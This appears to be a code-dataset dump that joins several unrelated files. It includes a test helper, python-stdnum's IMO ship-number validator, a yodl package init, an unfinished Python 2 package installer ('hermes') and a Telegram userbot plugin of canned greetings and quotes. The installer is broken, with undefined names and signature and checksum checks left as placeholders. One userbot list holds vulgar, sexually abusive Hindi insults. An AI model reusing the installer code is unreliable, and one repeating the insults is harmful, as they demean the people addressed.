download_fullpath = self.test_directory / download_basename
obj.download(download_fullpath)
self.assertTrue(download_fullpath.exists())
def search(self, cls_name, query, metadata_list, limit=1):
with self.client:
self.assertEqual(len(metadata_list), limit)
results = getattr(models, cls_name).search(query, limit=limit)
for result, metadata in zip(results, metadata_list):
for name, value in metadata.items():
self._test_search_result_metadata_equality(result, name, value)
@classmethod
def get_value(cls, obj, attribute_path):
return cls._get_value_recursive(
obj,
list(filter(None, attribute_path.split("."))),
)
@classmethod
def _get_value_recursive(cls, obj, paths):
if paths:
return cls._get_value_recursive(getattr(obj, paths[0]), paths[1:])
return obj
def _test_search_result_metadata_equality(self, result, name, value):
with self.subTest("Asserting metadata equality", **{name: value}):
self.assertEqual(self.get_value(result, name), value)
| none | 1 | 2.531335 | 3 |
odoo-13.0/venv/lib/python3.8/site-packages/stdnum/imo.py | VaibhavBhujade/Blockchain-ERP-interoperability | 0 | 13527 | <reponame>VaibhavBhujade/Blockchain-ERP-interoperability
# imo.py - functions for handling IMO numbers
# coding: utf-8
#
# Copyright (C) 2015 <NAME>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""IMO number (International Maritime Organization number).
A number used to uniquely identify ships (the hull) for purposes of
registering owners and management companies. The ship identification number
consists of a six-digit sequentially assigned number and a check digit. The
number is usually prefixed with "IMO".
Note that there seem to be a large number of ships with an IMO that does not
have a valid check digit or even have a different length.
>>> validate('IMO 9319466')
'9319466'
>>> validate('IMO 8814275')
'8814275'
>>> validate('8814274')
Traceback (most recent call last):
...
InvalidChecksum: ...
>>> format('8814275')
'IMO 8814275'
"""
from stdnum.exceptions import *
from stdnum.util import clean, isdigits
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
number = clean(number, ' ').upper().strip()
if number.startswith('IMO'):
number = number[3:]
return number
def calc_check_digit(number):
"""Calculate the check digits for the number."""
return str(sum(int(n) * (7 - i) for i, n in enumerate(number[:6])) % 10)
def validate(number):
"""Check if the number provided is valid. This checks the length and
check digit."""
number = compact(number)
if not isdigits(number):
raise InvalidFormat()
if len(number) != 7:
raise InvalidLength()
if calc_check_digit(number[:-1]) != number[-1]:
raise InvalidChecksum()
return number
def is_valid(number):
"""Check if the number provided is valid. This checks the length and
check digit."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the number to the standard presentation format."""
return 'IMO ' + compact(number)
| # imo.py - functions for handling IMO numbers
# coding: utf-8
#
# Copyright (C) 2015 <NAME>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""IMO number (International Maritime Organization number).
A number used to uniquely identify ships (the hull) for purposes of
registering owners and management companies. The ship identification number
consists of a six-digit sequentially assigned number and a check digit. The
number is usually prefixed with "IMO".
Note that there seem to be a large number of ships with an IMO that does not
have a valid check digit or even have a different length.
>>> validate('IMO 9319466')
'9319466'
>>> validate('IMO 8814275')
'8814275'
>>> validate('8814274')
Traceback (most recent call last):
...
InvalidChecksum: ...
>>> format('8814275')
'IMO 8814275'
"""
from stdnum.exceptions import *
from stdnum.util import clean, isdigits
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
number = clean(number, ' ').upper().strip()
if number.startswith('IMO'):
number = number[3:]
return number
def calc_check_digit(number):
"""Calculate the check digits for the number."""
return str(sum(int(n) * (7 - i) for i, n in enumerate(number[:6])) % 10)
def validate(number):
"""Check if the number provided is valid. This checks the length and
check digit."""
number = compact(number)
if not isdigits(number):
raise InvalidFormat()
if len(number) != 7:
raise InvalidLength()
if calc_check_digit(number[:-1]) != number[-1]:
raise InvalidChecksum()
return number
def is_valid(number):
"""Check if the number provided is valid. This checks the length and
check digit."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the number to the standard presentation format."""
return 'IMO ' + compact(number) | pt | 0.161467 | 3.557302 | 4 |
yodl/__init__.py | brunolange/yodl | 0 | 13528 | """yodl!
yodl provides a class decorator to build django models
from YAML configuration files
"""
from .decorators import yodl
from .io import yodlify
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
__all__ = ["yodl", "yodlify"]
| """yodl!
yodl provides a class decorator to build django models
from YAML configuration files
"""
from .decorators import yodl
from .io import yodlify
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
__all__ = ["yodl", "yodlify"]
| pt | 0.179741 | 1.891091 | 2 |
main.py | g-w1/hermes | 0 | 13529 | """
Usage: hermes install [-dsvV] <pkg>...
hermes -h | --help
hermes --version
Options:
-d, --depends Require dependency installation
-h, --help Display usage and options
-s, --check-sigs Verify package GPG signatures
-v, --verify Verify package checksums
-V, --verbose Display debugging messages
--version Display version
"""
from configure import valid_hermes_config
from configure import valid_pkg_config
from docopt import docopt # MIT License
import os # Standard Library
import requests # Apache License v2.0
import sh # MIT License
import tarfile # Standard Library
def dl_url(url):
dl = requests.get(source_url)
if not dl.status == 200: # is this actually a meaningful test?
return False
with open(pkg_id, 'wb') as archive: # pkg_id deoesn't include extension(s)
for chunk in dl.iter_content(1024):
archive.write(chunk)
# where does it write it? how does it know?
# what about errors?
return True
def get_pkg(pkg_id):
source_url = pkg_configs[pkg_id][source_url]
if not dl_pkg(source_url):
return False
if not os.path.isfile(os.path.join(hermes_dir, 'archives', pkg_id)):
return False
if not valid_archive(pkg_id):
return False
# if runtime_config[verify_pkg]:
# if not verified:
# return False
# if runtime_config[check_sigs]:
# if not verified:
# return False
return True
def get_pkg_config(pkg_id):
# This is a placeholder for repository-enabled functionality
return True
def install_pkg(pkg_id):
if runtime_config['install_dependencies']:
for dependency in pkg_configs[pkg_id]['dependencies']:
if not pkg_installed(dependency):
install_pkg(dependency)
# actual install code here
def main_installer(pkg_list):
for pkg_id in pkg_list:
if pkg_installed(pkg_id):
print pkg_id, 'is already installed.'
elif pkg_prepared(pkg_id):
install_pkg(pkg_id)
else:
# Error message
return False
def pkg_avail(pkg_id):
if True: # if archive is in hermes/archives and valid_archive(pkg_id)
return True
if get_pkg(pkg_id):
return True
# Error message
return False
def pkg_config_avail(pkg_id):
pkg_config_path = os.path.join(hermes_dir, 'configs', (pkg_id + '.hermes'))
if pkg_id in pkg_configs:
return True
elif os.path.isfile(pkg_config_path):
pkg_config = valid_pkg_config(pkg_config_path)
if pkg_config:
# populate pkg_configs[pkg_id] with contents of pkg_config
return True
else:
# Error message
return False
elif get_pkg_config(pkg_id):
return False # temporary short-circuit (get_pkg_config() is a dummy)
pkg_config = valid_pkg_config(pkg_config_path)
if pkg_config:
# populate pkg_configs[pkg_id] with contents of pkg_config
return True
else:
# Error message
return False
def pkg_installed(pkg_id):
# if symlink in target_dir points at package in hermes/pkg
# return True
# if symlink in target_dir points elsewhere
# deal with conflict
# if binary already exists in target_dir
# deal with conflict
# Error message
return False
def pkg_prepared(pkg_id):
if pkg_installed(pkg_id):
return True
if not pkg_config_avail(pkg_id):
# Error message
return False
if not pkg_avail(pkg_id):
# Error message
return False
if runtime_config[install_dependencies]:
for dependency in pkg_configs[pkg_id][dependencies]:
if not pkg_prepared(dependency):
# Error message
return False
return True
def populate_runtime_config():
hermes_config = dict()
system_config_path = os.path.join(hermes_dir, '.hermes.conf')
user_config_path = os.path.expanduser(os.path.join('~', '.hermes.conf'))
if os.path.isfile(user_config_path):
hermes_config = valid_hermes_config(user_config_path)
if not hermes_config and os.path.isfile(system_config_path):
hermes_config = valid_hermes_config(system_config_path)
if not hermes_config:
hermes_config['check_sigs'] = True
hermes_config['install_dependencies'] = False
hermes_config['target_dir'] = '/usr/local'
hermes_config['verify_pkgs'] = True
if cli_args['--depends']:
runtime_config['install_dependencies'] = True
if cli_args['--check-sigs']:
runtime_config['check_sigs'] = True
if cli_args['--verify']:
runtime_config['verify_pkgs'] = True
return hermes_config
def valid_archive(pkg_id):
tarball_name = pkg_id + pkg_configs[pkg_id]['tarball_ext']
tarball_path = os.join.path(hermes_dir, 'archives', tarball_name)
if not os.path.isfile(tarball_path):
return False
if not tarfile.is_tarfile(tarball_path):
return False
return True
def valid_pkg(pkg_id):
# if not valid_archive(pkg_id):
# Error message
# return False
# if cli_args[--verify'] and checksum is bad:
# Error message
# return False
# if cli_args['--check-sigs'] and sig is bad:
# Error message
# return False
return True
if __name__ == '__main__':
cli_args = docopt(__doc__, version='hermes v0.0.1')
print cli_args
# hermes_dir = os.path.dirname(sh.which('hermes'))
hermes_dir = 'hermes'
runtime_config = populate_runtime_config()
print runtime_config
pkg_configs = dict()
if cli_args['install']:
print 'Installing ', str(cli_args['<pkg>'])
main_installer(cli_args['<pkg>'])
| """
Usage: hermes install [-dsvV] <pkg>...
hermes -h | --help
hermes --version
Options:
-d, --depends Require dependency installation
-h, --help Display usage and options
-s, --check-sigs Verify package GPG signatures
-v, --verify Verify package checksums
-V, --verbose Display debugging messages
--version Display version
"""
from configure import valid_hermes_config
from configure import valid_pkg_config
from docopt import docopt # MIT License
import os # Standard Library
import requests # Apache License v2.0
import sh # MIT License
import tarfile # Standard Library
def dl_url(url):
dl = requests.get(source_url)
if not dl.status == 200: # is this actually a meaningful test?
return False
with open(pkg_id, 'wb') as archive: # pkg_id deoesn't include extension(s)
for chunk in dl.iter_content(1024):
archive.write(chunk)
# where does it write it? how does it know?
# what about errors?
return True
def get_pkg(pkg_id):
source_url = pkg_configs[pkg_id][source_url]
if not dl_pkg(source_url):
return False
if not os.path.isfile(os.path.join(hermes_dir, 'archives', pkg_id)):
return False
if not valid_archive(pkg_id):
return False
# if runtime_config[verify_pkg]:
# if not verified:
# return False
# if runtime_config[check_sigs]:
# if not verified:
# return False
return True
def get_pkg_config(pkg_id):
# This is a placeholder for repository-enabled functionality
return True
def install_pkg(pkg_id):
if runtime_config['install_dependencies']:
for dependency in pkg_configs[pkg_id]['dependencies']:
if not pkg_installed(dependency):
install_pkg(dependency)
# actual install code here
def main_installer(pkg_list):
for pkg_id in pkg_list:
if pkg_installed(pkg_id):
print pkg_id, 'is already installed.'
elif pkg_prepared(pkg_id):
install_pkg(pkg_id)
else:
# Error message
return False
def pkg_avail(pkg_id):
if True: # if archive is in hermes/archives and valid_archive(pkg_id)
return True
if get_pkg(pkg_id):
return True
# Error message
return False
def pkg_config_avail(pkg_id):
pkg_config_path = os.path.join(hermes_dir, 'configs', (pkg_id + '.hermes'))
if pkg_id in pkg_configs:
return True
elif os.path.isfile(pkg_config_path):
pkg_config = valid_pkg_config(pkg_config_path)
if pkg_config:
# populate pkg_configs[pkg_id] with contents of pkg_config
return True
else:
# Error message
return False
elif get_pkg_config(pkg_id):
return False # temporary short-circuit (get_pkg_config() is a dummy)
pkg_config = valid_pkg_config(pkg_config_path)
if pkg_config:
# populate pkg_configs[pkg_id] with contents of pkg_config
return True
else:
# Error message
return False
def pkg_installed(pkg_id):
# if symlink in target_dir points at package in hermes/pkg
# return True
# if symlink in target_dir points elsewhere
# deal with conflict
# if binary already exists in target_dir
# deal with conflict
# Error message
return False
def pkg_prepared(pkg_id):
if pkg_installed(pkg_id):
return True
if not pkg_config_avail(pkg_id):
# Error message
return False
if not pkg_avail(pkg_id):
# Error message
return False
if runtime_config[install_dependencies]:
for dependency in pkg_configs[pkg_id][dependencies]:
if not pkg_prepared(dependency):
# Error message
return False
return True
def populate_runtime_config():
hermes_config = dict()
system_config_path = os.path.join(hermes_dir, '.hermes.conf')
user_config_path = os.path.expanduser(os.path.join('~', '.hermes.conf'))
if os.path.isfile(user_config_path):
hermes_config = valid_hermes_config(user_config_path)
if not hermes_config and os.path.isfile(system_config_path):
hermes_config = valid_hermes_config(system_config_path)
if not hermes_config:
hermes_config['check_sigs'] = True
hermes_config['install_dependencies'] = False
hermes_config['target_dir'] = '/usr/local'
hermes_config['verify_pkgs'] = True
if cli_args['--depends']:
runtime_config['install_dependencies'] = True
if cli_args['--check-sigs']:
runtime_config['check_sigs'] = True
if cli_args['--verify']:
runtime_config['verify_pkgs'] = True
return hermes_config
def valid_archive(pkg_id):
tarball_name = pkg_id + pkg_configs[pkg_id]['tarball_ext']
tarball_path = os.join.path(hermes_dir, 'archives', tarball_name)
if not os.path.isfile(tarball_path):
return False
if not tarfile.is_tarfile(tarball_path):
return False
return True
def valid_pkg(pkg_id):
# if not valid_archive(pkg_id):
# Error message
# return False
# if cli_args[--verify'] and checksum is bad:
# Error message
# return False
# if cli_args['--check-sigs'] and sig is bad:
# Error message
# return False
return True
if __name__ == '__main__':
cli_args = docopt(__doc__, version='hermes v0.0.1')
print cli_args
# hermes_dir = os.path.dirname(sh.which('hermes'))
hermes_dir = 'hermes'
runtime_config = populate_runtime_config()
print runtime_config
pkg_configs = dict()
if cli_args['install']:
print 'Installing ', str(cli_args['<pkg>'])
main_installer(cli_args['<pkg>'])
| pt | 0.133275 | 2.447526 | 2 |
userbot/plugins/quotes.py | aksr-aashish/FIREXUSERBOT | 0 | 13530 | import random
import requests
from FIREX.utils import admin_cmd, edit_or_reply, sudo_cmd
from userbot.cmdhelp import CmdHelp
LOVESTR = [
"The best and most beautiful things in this world cannot be seen or even heard, but must be felt with the heart.",
"You know you're in love when you can't fall asleep because reality is finally better than your dreams.",
"Love recognizes no barriers. It jumps hurdles, leaps fences, penetrates walls to arrive at its destination full of hope.",
"Being deeply loved by someone gives you strength, while loving someone deeply gives you courage.",
"The real lover is the man who can thrill you by kissing your forehead or smiling into your eyes or just staring into space.",
"I swear I couldn't love you more than I do right now, and yet I know I will tomorrow.",
"When I saw you I fell in love, and you smiled because you knew it.",
"In all the world, there is no heart for me like yours. / In all the world, there is no love for you like mine.",
"To love or have loved, that is enough. Ask nothing further. There is no other pearl to be found in the dark folds of life.",
"If you live to be a hundred, I want to live to be a hundred minus one day, so I never have to live without you.",
"Some love stories aren't epic novels. Some are short stories. But that doesn't make them any less filled with love.",
"As he read, I fell in love the way you fall asleep: slowly, and then all at once.",
"I've never had a moment's doubt. I love you. I believe in you completely. You are my dearest one. My reason for life.",
"Do I love you? My god, if your love were a grain of sand, mine would be a universe of beaches.",
"I am who I am because of you.",
"I just want you to know that you're very special... and the only reason I'm telling you is that I don't know if anyone else ever has.",
"Remember, we're madly in love, so it's all right to kiss me any time you feel like it.",
"I love you. I knew it the minute I met you.",
"I loved her against reason, against promise, against peace, against hope, against happiness, against all discouragement that could be.",
"I love you not because of who you are, but because of who I am when I am with you.",
]
DHOKA = [
"Humne Unse Wafa Ki, Aur Dil Bhi Gya Toot, Wo Bhi Chinaal Nikli, Uski Maa ki Chut.",
"Dabbe Me Dabba, Dabbe Me Cake ..Tu Chutiya Hai Zara Seesha To Dekh.",
"Kaam Se Kaam Rakhoge Toh Naam Hoga, Randi Log Ke Chakkkar Me Padoge to Naam Badnaam Hoga.",
"Usne Kaha- Mah Lyf maH Rule, Maine Kaha Bhag BSDK , Tujhy Paida Karna hi Teri Baap ki Sabse Badi Vul.",
"Humse Ulajhna Mat, BSDK Teri Hasi Mita Dunga, Muh Me Land Daal Ke..Sari Hosiyaari Gand Se Nikal Dunga.",
"Aur Sunau Bhosdiwalo ..Kya Haal Hai?..Tumhare Sakal Se Zayda Toh Tumhare Gand Laal Hai!!",
"Pata Nhi Kya Kashish Hai Tumhare Mohabbat Me,Jab Bhi Tumhe Yaad Karta Hu Mera Land Khada Ho Jata Hai.",
"Konsa Mohabbat Kounsi Story, Gand Faad Dunga Agr Bolne Aayi Sorry!",
"Naam Banta Hai Risk Se, Chutiya Banta Hai IshQ Se.",
"Sun Be, Ab Tujhy Mere Zindegi Me Ane ka Koi Haq Nhi,,Aur Tu 1 Number Ki Randi Hai Isme KOi Saq Nhi.",
"Beta Tu Chugli Karna Chor De , Hum Ungli Karna Chor Dengy.",
]
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
GDNOON = [
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good Afternoon Dear!`",
"`With a deep blue sky over my head and a relaxing wind around me, the only thing I am missing right now is the company of you. I wish you a refreshing afternoon!`",
"`The day has come a halt realizing that I am yet to wish you a great afternoon. My dear, if you thought you were forgotten, you’re so wrong. Good afternoon!`",
"`Good afternoon! May the sweet peace be part of your heart today and always and there is life shining through your sigh. May you have much light and peace.`",
"`With you, every part of a day is beautiful. I live every day to love you more than yesterday. Wishing you an enjoyable afternoon my love!`",
"`This bright afternoon sun always reminds me of how you brighten my life with all the happiness. I miss you a lot this afternoon. Have a good time`!",
"`Nature looks quieter and more beautiful at this time of the day! You really don’t want to miss the beauty of this time! Wishing you a happy afternoon!`",
"`What a wonderful afternoon to finish you day with! I hope you’re having a great time sitting on your balcony, enjoying this afternoon beauty!`",
"`I wish I were with you this time of the day. We hardly have a beautiful afternoon like this nowadays. Wishing you a peaceful afternoon!`",
"`As you prepare yourself to wave goodbye to another wonderful day, I want you to know that, I am thinking of you all the time. Good afternoon!`",
"`This afternoon is here to calm your dog-tired mind after a hectic day. Enjoy the blessings it offers you and be thankful always. Good afternoon!`",
"`The gentle afternoon wind feels like a sweet hug from you. You are in my every thought in this wonderful afternoon. Hope you are enjoying the time!`",
"`Wishing an amazingly good afternoon to the most beautiful soul I have ever met. I hope you are having a good time relaxing and enjoying the beauty of this time!`",
"`Afternoon has come to indicate you, Half of your day’s work is over, Just another half a day to go, Be brisk and keep enjoying your works, Have a happy noon!`",
"`Mornings are for starting a new work, Afternoons are for remembering, Evenings are for refreshing, Nights are for relaxing, So remember people, who are remembering you, Have a happy noon!`",
"`If you feel tired and sleepy you could use a nap, you will see that it will help you recover your energy and feel much better to finish the day. Have a beautiful afternoon!`",
"`Time to remember sweet persons in your life, I know I will be first on the list, Thanks for that, Good afternoon my dear!`",
"`May this afternoon bring a lot of pleasant surprises for you and fills you heart with infinite joy. Wishing you a very warm and love filled afternoon!`",
"`Good, better, best. Never let it rest. Til your good is better and your better is best. “Good Afternoon`”",
"`May this beautiful afternoon fill your heart boundless happiness and gives you new hopes to start yours with. May you have lot of fun! Good afternoon dear!`",
"`As the blazing sun slowly starts making its way to the west, I want you to know that this beautiful afternoon is here to bless your life with success and peace. Good afternoon!`",
"`The deep blue sky of this bright afternoon reminds me of the deepness of your heart and the brightness of your soul. May you have a memorable afternoon!`",
"`Your presence could make this afternoon much more pleasurable for me. Your company is what I cherish all the time. Good afternoon!`",
"`A relaxing afternoon wind and the sweet pleasure of your company can make my day complete. Missing you so badly during this time of the day! Good afternoon!`",
"`Wishing you an afternoon experience so sweet and pleasant that feel thankful to be alive today. May you have the best afternoon of your life today!`",
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good afternoon dear!`",
"`Noon time – it’s time to have a little break, Take time to breathe the warmth of the sun, Who is shining up in between the clouds, Good afternoon!`",
"`You are the cure that I need to take three times a day, in the morning, at the night and in the afternoon. I am missing you a lot right now. Good afternoon!`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`I pray to god that he keeps me close to you so we can enjoy these beautiful afternoons together forever! Wishing you a good time this afternoon!`",
"`You are every bit of special to me just like a relaxing afternoon is special after a toiling noon. Thinking of my special one in this special time of the day!`",
"`May your Good afternoon be light, blessed, enlightened, productive and happy.`",
"`Thinking of you is my most favorite hobby every afternoon. Your love is all I desire in life. Wishing my beloved an amazing afternoon!`",
"`I have tasted things that are so sweet, heard words that are soothing to the soul, but comparing the joy that they both bring, I’ll rather choose to see a smile from your cheeks. You are sweet. I love you.`",
"`How I wish the sun could obey me for a second, to stop its scorching ride on my angel. So sorry it will be hot there. Don’t worry, the evening will soon come. I love you.`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`With you every day is my lucky day. So lucky being your love and don’t know what else to say. Morning night and noon, you make my day.`",
"`Your love is sweeter than what I read in romantic novels and fulfilling more than I see in epic films. I couldn’t have been me, without you. Good afternoon honey, I love you!`",
"`No matter what time of the day it is, No matter what I am doing, No matter what is right and what is wrong, I still remember you like this time, Good Afternoon!`",
"`Things are changing. I see everything turning around for my favor. And the last time I checked, it’s courtesy of your love. 1000 kisses from me to you. I love you dearly and wishing you a very happy noon.`",
"`You are sometimes my greatest weakness, you are sometimes my biggest strength. I do not have a lot of words to say but let you make sure, you make my day, Good Afternoon!`",
"`Every afternoon is to remember the one whom my heart beats for. The one I live and sure can die for. Hope you doing good there my love. Missing your face.`",
"`My love, I hope you are doing well at work and that you remember that I will be waiting for you at home with my arms open to pamper you and give you all my love. I wish you a good afternoon!`",
"`Afternoons like this makes me think about you more. I desire so deeply to be with you in one of these afternoons just to tell you how much I love you. Good afternoon my love!`",
"`My heart craves for your company all the time. A beautiful afternoon like this can be made more enjoyable if you just decide to spend it with me. Good afternoon!`",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"`Get back here!`",
"`Not so fast...`",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"`Jokes on you, I'm everywhere`",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"`Go bother someone else, no-one here cares.`",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
'"Oh, look at me! I\'m so cool, I can run from a bot!" - this person',
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"eviral has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"eviral has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
eviralOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"Howdy, howdy ,howdy!",
"hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"hello, sunshine!",
"`Hey, howdy, hi!`",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"`Hey there, freshman!`",
"`I come in peace!`",
"`I come for peace!`",
"Ahoy, matey!",
"`Hi !`",
]
CONGRATULATION = [
"`Congratulations and BRAVO!`",
"`You did it! So proud of you!`",
"`This calls for celebrating! Congratulations!`",
"`I knew it was only a matter of time. Well done!`",
"`Congratulations on your well-deserved success.`",
"`Heartfelt congratulations to you.`",
"`Warmest congratulations on your achievement.`",
"`Congratulations and best wishes for your next adventure!”`",
"`So pleased to see you accomplishing great things.`",
"`Feeling so much joy for you today. What an impressive achievement!`",
]
BYESTR = [
"`Nice talking with you`",
"`I've gotta go!`",
"`I've gotta run!`",
"`I've gotta split`",
"`I'm off!`",
"`Great to see you,bye`",
"`See you soon`",
"`Farewell!`",
]
GDNIGHT = [
"`Good night keep your dreams alive`",
"`Night, night, to a dear friend! May you sleep well!`",
"`May the night fill with stars for you. May counting every one, give you contentment!`",
"`Wishing you comfort, happiness, and a good night’s sleep!`",
"`Now relax. The day is over. You did your best. And tomorrow you’ll do better. Good Night!`",
"`Good night to a friend who is the best! Get your forty winks!`",
"`May your pillow be soft, and your rest be long! Good night, friend!`",
"`Let there be no troubles, dear friend! Have a Good Night!`",
"`Rest soundly tonight, friend!`",
"`Have the best night’s sleep, friend! Sleep well!`",
"`Have a very, good night, friend! You are wonderful!`",
"`Relaxation is in order for you! Good night, friend!`",
"`Good night. May you have sweet dreams tonight.`",
"`Sleep well, dear friend and have sweet dreams.`",
"`As we wait for a brand new day, good night and have beautiful dreams.`",
"`Dear friend, I wish you a night of peace and bliss. Good night.`",
"`Darkness cannot last forever. Keep the hope alive. Good night.`",
"`By hook or crook you shall have sweet dreams tonight. Have a good night, buddy!`",
"`Good night, my friend. I pray that the good Lord watches over you as you sleep. Sweet dreams.`",
"`Good night, friend! May you be filled with tranquility!`",
"`Wishing you a calm night, friend! I hope it is good!`",
"`Wishing you a night where you can recharge for tomorrow!`",
"`Slumber tonight, good friend, and feel well rested, tomorrow!`",
"`Wishing my good friend relief from a hard day’s work! Good Night!`",
"`Good night, friend! May you have silence for sleep!`",
"`Sleep tonight, friend and be well! Know that you have done your very best today, and that you will do your very best, tomorrow!`",
"`Friend, you do not hesitate to get things done! Take tonight to relax and do more, tomorrow!`",
"`Friend, I want to remind you that your strong mind has brought you peace, before. May it do that again, tonight! May you hold acknowledgment of this with you!`",
"`Wishing you a calm, night, friend! Hoping everything winds down to your liking and that the following day meets your standards!`",
"`May the darkness of the night cloak you in a sleep that is sound and good! Dear friend, may this feeling carry you through the next day!`",
"`Friend, may the quietude you experience tonight move you to have many more nights like it! May you find your peace and hold on to it!`",
"`May there be no activity for you tonight, friend! May the rest that you have coming to you arrive swiftly! May the activity that you do tomorrow match your pace and be all of your own making!`",
"`When the day is done, friend, may you know that you have done well! When you sleep tonight, friend, may you view all the you hope for, tomorrow!`",
"`When everything is brought to a standstill, friend, I hope that your thoughts are good, as you drift to sleep! May those thoughts remain with you, during all of your days!`",
"`Every day, you encourage me to do new things, friend! May tonight’s rest bring a new day that overflows with courage and exciting events!`",
]
GDMORNING = [
"`Life is full of uncertainties. But there will always be a sunrise after every sunset. Good morning!`",
"`It doesn’t matter how bad was your yesterday. Today, you are going to make it a good one. Wishing you a good morning!`",
"`If you want to gain health and beauty, you should wake up early. Good morning!`",
"`May this morning offer you new hope for life! May you be happy and enjoy every moment of it. Good morning!`",
"`May the sun shower you with blessings and prosperity in the days ahead. Good morning!`",
"`Every sunrise marks the rise of life over death, hope over despair and happiness over suffering. Wishing you a very enjoyable morning today!`",
"`Wake up and make yourself a part of this beautiful morning. A beautiful world is waiting outside your door. Have an enjoyable time!`",
"`Welcome this beautiful morning with a smile on your face. I hope you’ll have a great day today. Wishing you a very good morning!`",
"`You have been blessed with yet another day. What a wonderful way of welcoming the blessing with such a beautiful morning! Good morning to you!`",
"`Waking up in such a beautiful morning is a guaranty for a day that’s beyond amazing. I hope you’ll make the best of it. Good morning!`",
"`Nothing is more refreshing than a beautiful morning that calms your mind and gives you reasons to smile. Good morning! Wishing you a great day.`",
"`Another day has just started. Welcome the blessings of this beautiful morning. Rise and shine like you always do. Wishing you a wonderful morning!`",
"`Wake up like the sun every morning and light up the world your awesomeness. You have so many great things to achieve today. Good morning!`",
"`A new day has come with so many new opportunities for you. Grab them all and make the best out of your day. Here’s me wishing you a good morning!`",
"`The darkness of night has ended. A new sun is up there to guide you towards a life so bright and blissful. Good morning dear!`",
"`Wake up, have your cup of morning tea and let the morning wind freshen you up like a happiness pill. Wishing you a good morning and a good day ahead!`",
"`Sunrises are the best; enjoy a cup of coffee or tea with yourself because this day is yours, good morning! Have a wonderful day ahead.`",
"`A bad day will always have a good morning, hope all your worries are gone and everything you wish could find a place. Good morning!`",
"`A great end may not be decided but a good creative beginning can be planned and achieved. Good morning, have a productive day!`",
"`Having a sweet morning, a cup of coffee, a day with your loved ones is what sets your “Good Morning” have a nice day!`",
"`Anything can go wrong in the day but the morning has to be beautiful, so I am making sure your morning starts beautiful. Good morning!`",
"`Open your eyes with a smile, pray and thank god that you are waking up to a new beginning. Good morning!`",
"`Morning is not only sunrise but A Beautiful Miracle of God that defeats the darkness and spread light. Good Morning.`",
"`Life never gives you a second chance. So, enjoy every bit of it. Why not start with this beautiful morning. Good Morning!`",
"`If you want to gain health and beauty, you should wake up early. Good Morning!`",
"`Birds are singing sweet melodies and a gentle breeze is blowing through the trees, what a perfect morning to wake you up. Good morning!`",
"`This morning is so relaxing and beautiful that I really don’t want you to miss it in any way. So, wake up dear friend. A hearty good morning to you!`",
"`Mornings come with a blank canvas. Paint it as you like and call it a day. Wake up now and start creating your perfect day. Good morning!`",
"`Every morning brings you new hopes and new opportunities. Don’t miss any one of them while you’re sleeping. Good morning!`",
"`Start your day with solid determination and great attitude. You’re going to have a good day today. Good morning my friend!`",
